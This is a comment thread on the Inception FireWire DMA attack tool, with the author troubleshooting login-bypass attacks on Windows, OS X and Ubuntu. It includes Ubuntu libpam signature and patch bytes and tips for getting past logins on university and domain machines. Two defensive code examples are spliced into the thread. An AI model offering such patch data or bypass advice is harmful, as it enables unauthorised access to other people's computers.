            Aha – you’re using an old version of the tool – that offset is from the experimental signatures that were replaced some time ago. Do a git pull and try again.

            Let me know if that doesn’t solve your problems. A word of advice if you are attacking in the field: Ubuntu loads its kernel at high physical memory addresses. Depending on the physical memory size and layout of the target (if the machine has a dedicated graphics card, etc.) you may experience inability to read memory content over the 2/4 GiB mark. If the kernel is loaded above this mark, the unlock won’t work. Memory dumping will still work fine, though.

            Lycka till ;-)

          • Skrotor

            Strange, I hit the same signature even after a git pull, thoughts?

            Tack :P

  15. Tom


    Tried your program at home and it worked perfectly. Then took it to uni to try out. However it says that it worked but when I try to log on to the PC, it says incorrect password.

    The target pc is running XP and the attacker is running latest ubuntu.

    Could it be because my account at uni is a network one?



    • Carsten

      Correct. As your university PC probably authenticates against a central domain controller, the trick of allowing local blank passwords won’t work (you don’t have control over the DC password checking functionality). I’m currently considering migrating the Windows signatures to patch the local function that decides if accounts need to authenticate at all, which would probably fix domain logons as well. This is a future improvement, and not implemented at the moment.

      Depending on the state of the domain PC you are trying to hack, you may be able to log in locally (i.e., “Log into computer XXXX”) instead of logging into the domain. You could also try to disconnect the PC from the network before trying to log in.

      Also, depending on the legislation where you live, hacking your university’s property may be punishable by law. I would suggest testing this in a simulated environment rather than having a go at public computers, unless of course you have permission to do so.

      • Tom

        Cheers for the reply,

        I’m trying to use it in a demo I have on wednesday, should be really good.

        No problem, I’ll give them things a try tomorrow and if it still doesn’t work I’ll take in my desktop haha

        Thanks again,


  16. tekkenhead

    I just ran your new version and I have to say WOW. It is a lot faster than the previous versions. Nice.

  17. Goldfish

    Is there a download available for the Ubuntu live CD complete with this software?

    • Carsten

      If you follow the instructions above, you’ll be able to install on a Ubuntu live cd.

      I have no plans to distribute .deb packages.

      • goldfish

        Hi Carsten,
        I followed all instructions exactly. This is the setup:
        Ubuntu 11.04 i686
        python3 inception-0.13 libforensic1394-0.2
        no errors during build.

        ls /dev | grep fw results in fw0
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port.

        If I fire incept then I get the error “No firewire devices detected on the bus”.

        lsmod gives firewire_ohci as drivers, not the libforensic drivers.
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port. Incept places the same drivers back (firewire_uhci).
        What am I doing wrong?

        • Carsten

          What type of system are you attacking? Is it connected when running inception? Have you tried attacking other systems?

          • goldfish

            It is a Dell E4300, connecting to another laptop (Win7) does not make a difference. Is there a test mode to perform the steps that you do with Winlockpwn?

          • Carsten

            You must be connected to the other machine when running inception. The other machine’s FireWire device must work. Does a FireWire device pop up in device manager on the target?

            I don’t understand what you mean by ‘test mode’. You can use ‘-f’ to attack virtual machines, if that is what you’re aiming at.

        • Carsten

          I don’t understand why you are removing the FireWire modules. libforensic is a library, not a module. Suggest you reboot your system and try to run inception again – it will load the correct modules automatically.

          • goldfish

            Ah, I understood libforensics were replacement drivers. My bad.
            I tested now with a XP SP3 box. After connecting the firewire and firing inception the configuration screen displays a new device “Unknown Vendor and Model IEEE1394 SBP2 device”.
            I also tested a Win7 box, this displayed “Linux Firewire Unknown Model”.

            Where did I do something wrong?

          • Carsten

            And did you try to reboot the host system as I suggested above? I understand that you attack from a live CD and that you’ll have to reinstall Inception, but as you seem to have loaded/unloaded quite a few FireWire modules that may be the source of the problem.

            Also, if you are using a FireWire expansion card on the host side, make sure you keep this plugged in while rebooting. Ubuntu’s support for hotplugging is not really stable.

          • goldfish

            The host was rebooted, Inception reinstalled. The E4300 has a built-in firewire port so this is not the problem.

          • Carsten

            Hmm. I’m unable to reproduce this error on any of my hardware. I’ve tested this on 3 different Lenovo computers and two Apple Macs, using both built-in and expansion ports. I’ve never heard of this problem before.

            I don’t have any LiveCDs to test from though, and that may be the issue. Suggest you try to attack from a permanent install, and/or another machine (or an expansion card). This may be a HW problem at your DELL.

            Failing both attacking from a permanent install and another machine, please open a ticket at github describing the problem with as much detail as possible (HW, chipsets, OS version, inception version, etc.).

          • goldfish

            I spent both last night and the whole day testing Inception without any luck. Tested on 3 laptops, both from live CD and HDD installed, all give the same (wrong) result “No firewire devices detected on the bus”. Obviously I am doing something wrong, but what?
            The ticket you suggested is opened. Thanks so far.

  18. james

    Wow, please tell me I’ve found a tool for my problem – I have forgotten my notebook (Win7 Bitlocker) administrator password and can only log in now as a normal user. Can’t boot from USB or CD to run offline tools, which won’t work anyway with Bitlocker.

    Will I be able to use inception to allow me to login as administrator with any password and then proceed to reset it or alternatively create another admin account to save the day?

    • Carsten

      Yes – that should work (provided that I remember the bitlocker architecture correctly). I haven’t tested this, though.

      Just use ‘runas’ or ‘run as administrator’ to run the user management app after Inception is done patching.

  19. Alex

    I used your tool to crack my OS. I have a question: can Intel’s VT-d not protect against DMA attackers? I am confused about why the IOMMU does not defend against such an attacker.

  20. Konrads

    On one Windows Vista machine, I get an error:
    The driver has detected a device with old or out-of-date firmware. The device will not be used.
    Event ID: 25
    EventData: \Device\Sbp2\Linux Firewire&UNKNOWN_MODEL&0&354fc000_0d4e3890_Instance00

    • Carsten

      Interesting. You don’t write anything about what happens on the client side though, can you fill out a detailed issue on github?

      • Konrads

        Just added an issue on github re Windows Vista. Let me know if you need more information.

  21. Zeliz

    Could you let this tool modify the kernel? The lib-pam is in userspace, so PAM-based authentication is overwritten in userspace.

  22. Zeliz

    I want to dump the memory of a specific address region. My address is like 0xeb5f5499, so in your dump mode I typed incept -d 0xeb5f5499. Am I using it in the right way? Because I don’t see what I want. Thanks

    • Carsten

      No, that’s not the right way. Use incept -h to get a description on how to use the dump mode. And remember that physical memory address != virtual memory address.

      • Zeliz

        Thanks! For now I want to use this tool to modify an address which I have already found in the dump file. How can I change the settings or other files to do this? I just need to modify this place, no matter what kind; do I just change the location of the signature to my place? In `settings`? Thanks!

        • Carsten

          I’ll add a mode where you can specify signature, patch and offset from the command line. Stand by for a new release in a week or so. If you are in a hurry you can modify

  23. Berklin

    I am not clear about the signature locations, because for Ubuntu it is:
    Offsets: 0xebd, 0xbaf, 0xa7f
    Signature: 0x83f81f89c774
    Patch: 0xbf00000000eb
    But when I got the result from attacking, it shows:
    Searching, 3368 MiB so far. Sample data read: 0x894424108d44
    Signature found at 0xd281dbaf (@page # 862237)
    Data written: 0x0xbf00000000eb
    Data read: 0x0xbf00000000eb

    The `Sample data read` didn’t match the Signature, and the Patch also didn’t match the `Data written`. Why?

    • Carsten

      The sample data read doesn’t match the signature because the tool only outputs data read every 128 pages or so (that’s why it’s called a ‘sample’).

      The patch does match the data written in your example above, so I guess I’m not sure I know what you’re asking?

    • Carsten

      BackTrack doesn’t load FireWire drivers when you hotplug a device into the machine.

      Issue the following command:

      modprobe firewire-ohci firewire-sbp2

      in the terminal on your BT machine to load the drivers on the victim side into the kernel. Because of this, BT is also not vulnerable to the attack by default. Good on the people that configured BT – secure defaults are a good thing.

      If you still are having trouble, verify that the cable and interfaces actually work by connecting a real FW device (such as a hard drive) to both the victim and the host, using the same cable.
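The observation in the reply above, that a machine which never loads the FireWire drivers does not accept the device, can be turned into a host check. This is an added example, not code from the thread or from Inception: the module names come from the `modprobe` command above, the `lsmod` sample is the output a commenter posts later in this thread, and the modprobe.d policy text and the status labels are constructed for illustration.

```python
"""Added example: report whether the FireWire modules named above can load."""

# Module names taken from the modprobe command in the reply above.
FIREWIRE_MODULES = ("firewire_ohci", "firewire_sbp2")

# lsmod rows as posted by a commenter later in this thread.
SAMPLE_LSMOD = """\
firewire_ohci 40172 0
firewire_core 56906 1 firewire_ohci
crc_itu_t 12627 1 firewire_core
"""

# Constructed modprobe.d content for the demonstration.
SAMPLE_MODPROBE_CONF = """\
# constructed example policy
blacklist firewire-sbp2
install firewire-ohci /bin/false
"""


def normalize(name):
    """modprobe treats '-' and '_' in module names as the same character."""
    return name.strip().replace("-", "_")


def loaded_modules(lsmod_text):
    """Return the module names found in lsmod (or /proc/modules) style text."""
    names = set()
    for line in lsmod_text.splitlines():
        fields = line.split()
        # Data rows are "name size refcount ..."; the header row is skipped
        # because its second field is not a number.
        if len(fields) >= 3 and fields[1].isdigit():
            names.add(normalize(fields[0]))
    return names


def modprobe_policy(conf_text):
    """Return (blacklisted, disabled) module sets from modprobe.d text.

    'blacklist X' only stops alias-based automatic loading; an explicit
    'modprobe X' still works. 'install X /bin/false' makes modprobe run
    /bin/false instead of loading the module.
    """
    blacklisted, disabled = set(), set()
    for raw in conf_text.splitlines():
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        if fields[0] == "blacklist" and len(fields) == 2:
            blacklisted.add(normalize(fields[1]))
        elif (fields[0] == "install" and len(fields) == 3
              and fields[2] in ("/bin/false", "/bin/true")):
            disabled.add(normalize(fields[1]))
    return blacklisted, disabled


def assess(lsmod_text, conf_text):
    """Map each FireWire module to one of four constructed status labels."""
    loaded = loaded_modules(lsmod_text)
    blacklisted, disabled = modprobe_policy(conf_text)
    report = {}
    for module in FIREWIRE_MODULES:
        if module in loaded:
            report[module] = "loaded"            # driver is active right now
        elif module in disabled:
            report[module] = "load-disabled"     # modprobe will not load it
        elif module in blacklisted:
            report[module] = "autoload-blocked"  # manual modprobe still works
        else:
            report[module] = "loadable"          # nothing prevents loading
    return report


if __name__ == "__main__":
    for module, status in assess(SAMPLE_LSMOD, SAMPLE_MODPROBE_CONF).items():
        print(f"{module}: {status}")
```

On a real host, feed `assess()` the contents of `/proc/modules` and the concatenated files under `/etc/modprobe.d/`.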

  24. etudiant404


    I am studying the DMA issue. Inception is a very good tool, thanks a lot for this. I noticed it is also possible to do a DMA attack with an old iPod. I have one but I don’t manage to use it in the correct way…
    Any clues please?

    Thanks in advance!

    • Carsten

      I’ve experimented with the iPod option itself, the problem is that the iPodLinux project is not that active anymore, it relies on the old Linux FireWire stack, and 1-3G iPods with FireWire are not easy to come by. The best I can do is to urge you to read the documentation on the iPodLinux site.

      Inception will not work on an iPod as it uses the new Linux JuJu FireWire stack (introduced in the 2.6.31 Linux kernel). You would have to use winlockpwn.

      • etudiant404


        Sorry for this late answer and thanks for your quick answer. I will check out winlockpwn. And if it doesn’t work because the program is too old, I will use a laptop as a demo tool. The main point for me is to have a platform to do some attack examples for potential customers, and doing this from an iPod is more impressive and furtive than from another computer.

        However, thanks again!

  25. Nickless

    Hi Carsten,

    great tool. I tested it a couple of times against a 12.04 victim and it worked well.
    But after a week or so it doesn’t work anymore! Nothing changed, same victim, same attacker, same cable. Tried different cables. Also booted victim machine in Windows.
    Also installed Backtrack 5R3 on attacker machine.
    I now always get the message:
    [!] FireWire modules do not seem to be loaded. Load them? [Y/n]: y
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    lsmod | grep fire shows:
    firewire_ohci 40172 0
    firewire_core 56906 1 firewire_ohci
    crc_itu_t 12627 1 firewire_core

    If I unplug the cable and put it back in I get:
    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    Any idea what could be happening here?

    • Carsten

      Not really easy to say what this could be, I’ve never experienced this myself. I haven’t tested Inception with BT5R3 yet, so have that in mind.

      This sounds like an error on the host side of the connection. Have you tried to recompile and reinstall the libforensic1394 libraries? I would also have a look at what the command dmesg outputs before and after you plug/unplug the cable.

      I would also test that the FireWire interfaces on both sides (host and victim) still work. Good luck!

  26. sgh

    Awesome tool. Has anyone got this working over a Thunderbolt cable yet? I’m connecting a Mac Mini with BT5 to a retina MBP and pickpocket isn’t detecting the latter.

      • Carsten

        It works over Thunderbolt, kinda. You have to use a FireWire to Thunderbolt converter (available at the Apple store), as Thunderbolt to Thunderbolt won’t work (the tool is using FireWire DMA to gain access as of now).

        • sgh

          Interesting. I got the adapter, but still no success. Even more strange, rebooting with only FW plugged in (adapter-less) now yields “No FireWire devices detected on the bus/Attach unsuccessful” even though lspci detects the controller.

          • Carsten

            Do other modes than pickpocket work?

            Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a hardware issue.

  27. void

    I’ve been unsuccessful in attacking Win7 x64 enterprise from BT5r3.
    Steps taken:
    Check BIOS on both machines to see if IEEE1394 port is enabled.
    Connected both laptops (HDD LED on victim machine goes flashing for a while, so it’s being recognised/installed it seems, also the ‘Device Manager’ screen refreshed itself a couple of times).
    Output on BT:
    [email protected]:~/Desktop/carmaa-inception-5e0426e# ./

    [+] Setting up the environment
    [-] 'firewire-ohci' mod already loaded – skipping
    [-] Directory '/pentest/forensics/IR' already exists – skipping
    [+] Downloading & installing required files
    [-] 'cmake' already installed – skipping
    [-] 'python3' already installed – skipping
    [-] 'libforensic1394-0.2.tar.gz' already downloaded – skipping
    [+] Building 'libforensic1394-0.2' …
    [-] Directory 'inception' already exists – skipping
    [+] Launching inception

    v.0.1.4 (C) Carsten Maartmann-Moe 2012
    Download: | Twitter: @breaknenter

    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    [ 172.611925] firewire_ohci 0000:86:09.0: PCI INT A -> GSI 20 (level, low) -> IRQ 20
    [ 172.611931] firewire_ohci 0000:86:09.0: setting latency timer to 64
    [ 172.676377] firewire_ohci: Added fw-ohci device 0000:86:09.0, OHCI v1.10, 4 IR + 4 IT contexts, quirks 0x11
    [ 173.176134] firewire_core: created device fw0: GUID 5566778811223344, S400
    [ 174.808267] firewire_core: refreshed device fw0
    [ 177.028532] firewire_core: refreshed device fw0

    [email protected]:~/Desktop/carmaa-inception-5e0426e# lsmod |grep fire
    firewire_ohci 39964 0
    firewire_core 61165 1 firewire_ohci
    crc_itu_t 12579 1 firewire_core

    I’ve seen your comment that you didn’t test with BT5r3 yet, but perhaps I can help you assist in troubleshooting, let me know if you need more info/output.

    • Carsten

      I just tested inception from BT5R3 against two different machines running fully updated Win7 x64, both succeeded. This is likely a hardware problem, especially since you cannot see any other devices on the FW bus.

      What kind of FW cable are you using (4/6/9 pin)? Are you using an express card on the BT5 side?

      • void

        That’s odd, must be a hardware thing then.
        I’m using the 4 pins on both sides, I don’t know if that’s a problem?
        I heard someone say firewire has a cross cable thing like ethernet has, but I couldn’t find much about it.
        Just to be sure I don’t do anything wrong, could you do a step by step run down of how you successfully attacked?
        The problem with testing is that I don’t have any other firewire hardware, especially with 4 pins connector available :/
        Thanks for your time!

        • Carsten

          There’s nothing really much of a process for attacking:

          1. Attach host and victim
          2. Run the tool

          Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a hardware issue. That includes testing your hardware with a FireWire device.

  28. Fu

    Hi Carsten
    It’s a great tool. I tried your tool on a Windows 7 32-bit machine and it worked great.
    But when I tried it on a Windows 7 64-bit machine it didn’t work. I checked the signature for my operating system and updated the tool. The program says that it found the signature and patched, but I can’t log in to the system. I dumped the memory and saw that the tool really wrote to memory. I couldn’t solve the problem. Do you have any idea?

      • Fu

        msv1_0.dll version 6.1.7600.16385,
        Windows 7 Ultimate 64 bit,
        signatures 0x291, 0x2a8, 0x321, 0x2a2, 0x2a1, 0x6a2

        • Carsten

          Thanks, will look into it. This sounds like a false positive, have you tried to run the tool twice in a row (i.e., let the tool patch twice)?

          • Fu

            I ran the tool almost thirteen times and finally it worked. It took a really long time.
            Do you have any idea about how this problem could be fixed?

          • Carsten

            You’ve got to give me a more detailed description than that. Please describe, in detail, the events that led to success. Did it patch every time? Did it get DMA? etc.

          • Fu

            Unfortunately it didn’t patch every time. Did it get DMA? I didn’t understand what you mean. If it doesn’t get DMA, it will never work. Am I wrong?

          • Carsten

            Use the -v switch to see if you’re getting data (you should see sample bytes being displayed). You may not be getting DMA every time. Also, see the question above: How much RAM does your target have?

          • Carsten

            See the troubleshooting/caveat section above. The signature may be situated above 2 GB, which you may not be able to read.

  29. Fu

    Could the signatures be variable or something else? My trial on Windows 7 64 bit is a little odd. I know the exact signature and offset. The tool sometimes works. But sometimes, although searching through all the memory, the tool couldn’t find any sign. I ran it more than once in a row but it didn’t give me a stable solution. I tried it on two different Windows 7 64 bit systems (which have different offsets). Am I doing something wrong? Could you suggest a solution for that?

  30. Thilaknath

    Hi Carsten, I found this tool pretty interesting, and the way in which it penetrates the opponent’s system. Can you please help me out by providing some study materials on how exactly Inception manages to read the victim’s RAM and overwrite it with the code?

    Thank you

  31. Igor

    I tried your script against Windows 7 x86 with 2GB RAM and Windows 7 x64 with 4 GB RAM and I was successful. On the x64 machine, although, the system was not usable after logging in, every app crashed.

    Then I tried Mac Mini with Mac OS 10.7.2 and 4 GB RAM and Macbook Pro with Mac OS 10.7.2 with no luck. The script writes that the DMA shield is down, reads the whole 4 GB of memory but with no success. Any idea where the problem may be?

    • Carsten

      What servicepack? On what offset is the tool patching? Read the article above and post an issue on github.

      For the macs, use -v to see if you actually have DMA. Again, read the troubleshooting section above.

  32. AJ

    Hello! Great tool! Ran into a problem though!

    I got it to work. Was all happy about it. Then I turned off both my machines. Now having them powered up again and trying to do the same it does not work.

    As my Linux (Ubuntu 12.02 LTS) machine sees its firewire and having the drivers on my win 7 64-bit machine, same as yesterday, when I type incept it keeps telling me that there is no device detected. Also tried it on a second win vista pc but the same message. I have read all the above, FAQ and all but have not managed to get it working for a second time.

    Any relevant tips or suggestions are welcome!

  33. J3ster

    Curious if others have experience to share with regards to the two points below.

    – Does the DLL patching work when the victim machine has been hardened with renamed local admin accounts?

    – What about local Windows versions in different languages than English?

    Great tool.

    • Carsten

      The tool patches the authentication mechanism itself, what accounts you have on the system doesn’t matter, all accounts will be unlocked.

      Have only tried a Norwegian version of XP and that worked, language shouldn’t matter. If you find that it does, please submit a bug on github.

  34. Jesse

    I was wondering if Inception will be changed to look over 4gb of ram. As it gets more common to have more ram these days!?

    Nice tool btw. I’ve learned a lot lately.. all for educational purposes! I am enjoying the knowledge!

    • Carsten

      The 4 GiB limit is not imposed by Inception, but by the fact that FireWire uses 32-bit addressing. There’s no way of getting around that limit using FireWire, unfortunately.

  35. Will

    Hello, I’m pretty new at this, and I’m getting the cable tomorrow, but I was wondering if I would be able to use this with a firewire and adapter to thunderbolt, from my macbook pro mid 2012 to a macbook air mid 2012 (only has thunderbolt). Once I connect the 2, I should be able to use this tool? Any help would be great, thank you in advance!

  36. samet


    I’ve tried it between Windows 7 x64 SP1 (HP Elitebook 8460p && 8gb RAM) and Backtrack 5r3. However it does not work. I checked the offset information with IDA and it’s true. After searching memory (4096 mb), the program says “attack unsuccessful” and then Windows 7 freezes. It does not respond to anything (even the mouse does not work). What may be the problem?


    • Carsten

      See the troubleshooting section above.

      The DLLs that Inception patches in-memory may be located above 4 GiB in RAM, which is not accessible to FireWire. This is a known issue with x64 Windows 7 and up machines.

      If you want to test you could remove one of the memory modules and re-test with only 4 GiB of RAM.

      • Jeroen

        Typically it stops with the error message somewhere in between 60 – 80%. Same Setup works fine on other target systems.

  37. newf

    I am trying your tool in BackTrack 5. I followed the instructions above and none gave an error. Then when I run the tool it gave this error

    ImportError: No module named forensic1394.bus

    I copied libforensic1394 files into /usr/lib folder but it didn’t solve my problem.
    Do you have any idea about this error?

    • Carsten

      Removed a small typo in the install instructions (‘../’). Make sure you’ve installed the python3 bindings for the libforensic1394 library by going to the libforensic1394-0.2/python source directory and executing ‘sudo python3 install’.

  38. Thilaknath

    Hi I have tried to use inception on the following configuration listed below

    firewire ( 4 pin cable)
    Target OS : Windows 7 with a 4gb ram,
    Host OS: Backtrack 5 v r3,
    I have installed the libforensic library and python 3 binding but still, after numerous efforts, it displays the logo of inception and prints
    ATTACK UNSUCCESSFUL, no firewire device found, but the cable seems to work fine,
    I think the problem is that the Backtrack OS is not able to detect the firewire port, can you please help me out

    • Carsten

      The tool works perfectly from BackTrack, that’s the OS I’m using all the time. Check your hardware, BIOS settings and cable.

  39. funguy

    Congratulations. Works perfectly on a Mac Book Pro 7 (running ubuntu 12.10 lts, 8gb ram, 64 bit)
    It reset the password of the screensaver on my home machine to anything.
    (also running ubuntu 12.10 lts , 3 gb ram, 32 bit)
    Great work. (not ironic)

    I strongly suggest you now help the community to fix this huge problem.
    Countermeasure ideas or suggestions would be a good help.

    • Carsten

      See linked resources above for countermeasures. I guess I disagree about the “hugeness” of the problem, but I agree that it is a problem that needs to be fixed.

  40. r


    How does inception patch memory? Isn’t there some page protection enforcement?
    as far as I know, even if you use DMA you can’t bypass page protection mechanism :/

    Maybe you could explain the magic which is done behind the scenes ? (or refer to the code) ?

  41. Cote

    So the only way to protect against this is to disable FireWire in the bios for Desktop PCs? For a laptop, just disable PCMCIA/ExpressCards SDIO and Thunderbolt?

  42. Kurious

    Attack on Windows 7 Enterprise 64bit machine with bitlocker appears to be successful. Firewire detected, attack reported as successful. However, no elevated rights, and can’t seem to log on with any password to obtain administrator rights. Only two local logon accounts available, with the Administrator account disabled. Only logon I have available is my domain logon with restricted rights. Any suggestions on how to gain administrator rights?

        • Carsten

          Maybe you could try to open a command shell as Administrator after running the tool (Right click cmd.exe -> Run as administrator)? You may have to disconnect from the network (e.g., the AD domain) to force a local check of the cached password as opposed to a full AD check.

  43. Fabi

    Quick question from a newbie: Would it also be possible to search for a file path in RAM and replace it with another file path? If yes, how would that work and could I do it using your -m switch?

    • Carsten

      You can search for anything that is loaded in memory. File paths may be loaded at different offsets within pages between re-boots, so you may have trouble locating them reliably without doing a sequential search, which will likely yield a lot of false positives. If the file path is hardcoded in a binary, it will be loaded at the same offset within a memory page each time, which will make it easier to locate it. That’s the way Inception works – it searches for signatures at pre-determined offsets within the memory pages.

      Take a look at inception/ for more on the way the signatures are structured.
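The page-offset matching described in the reply above can also be used by an analyst examining an acquired memory image: check the same in-page offsets and report whether each location holds the original bytes or the modified ones. This is an added example, not Inception's own code; the signature, patch and offsets are the Ubuntu values quoted in comment 23 of this thread, the 4 KiB page size is inferred from the page numbers in the tool output posted above, and the sample image and function names are constructed for illustration.

```python
"""Added example: classify bytes at fixed in-page offsets of a memory image."""
from dataclasses import dataclass

PAGE_SIZE = 4096  # matches "0xd281dbaf (@page # 862237)" in the thread

# Values quoted in the thread for the Ubuntu target (comment 23).
SIGNATURE = bytes.fromhex("83f81f89c774")
PATCH = bytes.fromhex("bf00000000eb")
OFFSETS = (0xEBD, 0xBAF, 0xA7F)


@dataclass(frozen=True)
class Hit:
    address: int  # physical address = page * PAGE_SIZE + offset
    page: int
    offset: int
    state: str    # "original" (signature bytes) or "patched" (patch bytes)


def split_address(address):
    """Split a physical address into (page number, offset within the page)."""
    return divmod(address, PAGE_SIZE)


def scan_image(image, base_address=0):
    """Check every page of `image` at the known offsets only.

    `image` is any bytes-like object (bytes, bytearray, or an mmap of a dump
    file); `base_address` is the physical address of its first byte. Content
    that sits at any other offset is ignored, which is what keeps the search
    fast and is also why a hit is a lead to verify, not proof: unrelated
    pages can hold the same six bytes at the same offset.
    """
    if base_address % PAGE_SIZE:
        raise ValueError("base_address must be page aligned")
    hits = []
    for page_start in range(0, len(image), PAGE_SIZE):
        for offset in OFFSETS:
            pos = page_start + offset
            chunk = image[pos:pos + len(SIGNATURE)]
            if chunk == SIGNATURE:
                state = "original"
            elif chunk == PATCH:
                state = "patched"
            else:
                continue
            page, in_page = split_address(base_address + pos)
            hits.append(Hit(base_address + pos, page, in_page, state))
    return hits


def build_sample_image():
    """Constructed 4-page image: one original, one patched, one decoy."""
    image = bytearray(4 * PAGE_SIZE)
    image[1 * PAGE_SIZE + 0xBAF:1 * PAGE_SIZE + 0xBAF + 6] = SIGNATURE
    image[2 * PAGE_SIZE + 0xEBD:2 * PAGE_SIZE + 0xEBD + 6] = PATCH
    # Same bytes at an offset that is not in OFFSETS: must not be reported.
    image[3 * PAGE_SIZE + 0x100:3 * PAGE_SIZE + 0x100 + 6] = SIGNATURE
    return bytes(image)


if __name__ == "__main__":
    for hit in scan_image(build_sample_image()):
        print(f"{hit.state:8s} at {hit.address:#x} "
              f"(page {hit.page}, offset {hit.offset:#x})")
```

Physical addresses in a dump are not virtual addresses, as noted earlier in the thread, so a location found this way has to be mapped back to the owning process or library before drawing conclusions.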

  44. Fabi

    Ok I see. How would that work, I mean would it be difficult for me to modify inception in order to do that?

  45. skies

    I’ve noticed that inception freezes/bluescreens the windows target if shared memory for the graphic card is used as soon as inception touches the shared memory areas.
    Of course, that is not an inception problem and probably cannot be fixed, so I just wanted to let you know and ask for confirmation and maybe a note could be taken for others wondering why the target freezes.

  47. Erik Westrup

    How do you, in Linux, find where pam_authenticate() is usually placed in real memory? I’ve been trying to pass a memory dump from fmem to strings etc. Running “nm -D /lib/i386-linux-gnu/ | grep authenticate” gives the internal lib offset, I believe.

    • Carsten

      You won’t be able to predict where it is placed in memory – but you can predict where within a single memory page certain parts of the code are loaded. To generate signatures for Inception you’ll have to reverse engineer the binary of the function you want to locate – e.g. the binary containing pam_authenticate() – and find the offset of the code you want to change.

  48. Max

    Hi Carsten, I’m trying to install Inception on OS X, and after installing it, when I try to run it I get this error:
    ImportError: cannot import name firewire

    Traceback (most recent call last):
    File “./incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/opt/local/src/inception/inception/”, line 24, in
    from inception import firewire, cfg, sound, util, term
    ImportError: cannot import name firewire

    Thanks in advance for your help

    • Sebastian

      @Max: this means your forensic1394 packet is not installed properly. After building it go to /forensic1394/python dir and do a “sudo python3 install”

      osx installation instructions are pretty bad :(

  49. James

    Since you are able to use this to attack a machine with a Thunderbolt port by using a Thunderbolt / FW adapter, why would it not work using a Thunderbolt-Thunderbolt cable? It seems that the victim machine is already “speaking” Thunderbolt.

  50. crabbies

    Can this attack work if both machines only have express card slots? If so what cable would be used? Presume it would still work as still direct access?

  51. LipAir

    Hello, I have installed Inception on an iMac (10.8) and connected it to my Win7 machine. My hard disk D: is locked with BitLocker;

    Last login: Mon Feb 25 20:19:43 on ttys000
    /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    LipAirs-iMac:~ LipAir$ /Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept ; exit;
    Traceback (most recent call last):
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/incept”, line 27, in
    from inception import firewire, screenlock, memdump, pickpocket, cfg, util, term
    File “/Users/LipAir/forensic1394/python/inception/forensic1394/python/inception/inception/”, line 33, in
    from forensic1394.bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 1, in
    from .bus import Bus
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 25, in
    from forensic1394.functions import forensic1394_alloc, forensic1394_destroy, \
    File “/Library/Frameworks/Python.framework/Versions/3.3/lib/python3.3/site-packages/forensic1394/”, line 32, in
    raise ImportError

    can you help me??


  52. Frank Luo

    I have a laptop encrypted with BitLocker but lost the key. Is it possible for me to use Inception to get the recovery key?

  53. Paul

    attacking windows 8 x64 failed. I analyzed the dumped memory of victim, the signature+offset seem match with the value of it’s weird… any hint?

  54. Josh

    Is there a way to use the tool to extract the entire 4GB memory region ? will that crash the target because of mapped PCI regions ?

  55. Ruslan

    Hello everyone.
    First of all thanks to Carsten for the great tool.
    The main reason of my post is addressed to the people, having troubles with “no firewire device found”.
    I have experimented with the tool long enough and found following:
    If you have fw in lspci, if you have firewire_ohci, firewire_sbp2 in lsdev and still have no firewire device found – change the cable. 95% is a cable trouble, even if it worked just a day before. It sounds strange, but I have triple-checked that fact, using several cables, connecting to three different PCs with different fw cards – and I’m sure. My first cable worked just fine for a week or so, but one day the tool stopped working, giving the annoying error. I spent about four days inspecting all kinds of software reasons, because I thought it was not hardware. Then, at last, I tried changing the cable – and it worked a couple of times. It was a sad surprise when the new cable stopped working again. I bought three different cables and at last found the one which works perfectly. So, if you are experiencing trouble, I suggest this as the very first thing – if you have the possibility to use a 6-pin to 6-pin cable – make or buy a 6-pin cable with only 4 pins connected: 3 to 5, 5 to 3, 4 to 6, and 6 to 4. 1 and 2 should not be connected. This is the only cable that always works. Sorry for possible mistakes, I’m not a native English speaker.

    • Carsten

      This is a very good point. I’ll create a link to the Amazon products I know are working 100 % of the time for me.

      In my experience as well, the cable is at fault 95 % of the time.

  56. Fritz

    Hi, Inception seems not to work when booting Windows in “Safe Mode” (via F8). Working in Safe Mode would be an interesting feature, given that some device control management solutions are not configured or even don’t work in safe mode. Will there be an update so that Inception will work in safe mode as well?

    Thanks very much & kind regards!


  57. Jeroen

    Problem with MacOS 10.6.8. Log:

    [email protected]:/opt/inception# ./incept -v

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.2.5 (C) Carsten Maartmann-Moe 2013
    Download: | Twitter: @breaknenter

    [*] FireWire devices on the bus (names may appear blank):
    [1] Vendor (ID): Apple Computer, Inc. (0xa27) | Product (ID): Macintosh (0xa)
    [*] Only one device present, device auto-selected as target
    [*] Selected device: Apple Computer, Inc.
    [*] Available targets (known signatures):
    [1] Windows 8: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [2] Windows 7: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [3] Windows Vista: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [4] Windows XP: msv1_0.dll MsvpPasswordValidate unlock/privilege escalation
    [5] Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
    [6] Ubuntu: libpam unlock/privilege escalation
    [7] Linux Mint: libpam unlock/privilege escalation
    [?] Please select target (or enter ‘q’ to quit): 5
    [*] Selected target: Mac OS X: DirectoryService/OpenDirectory unlock/privilege escalation
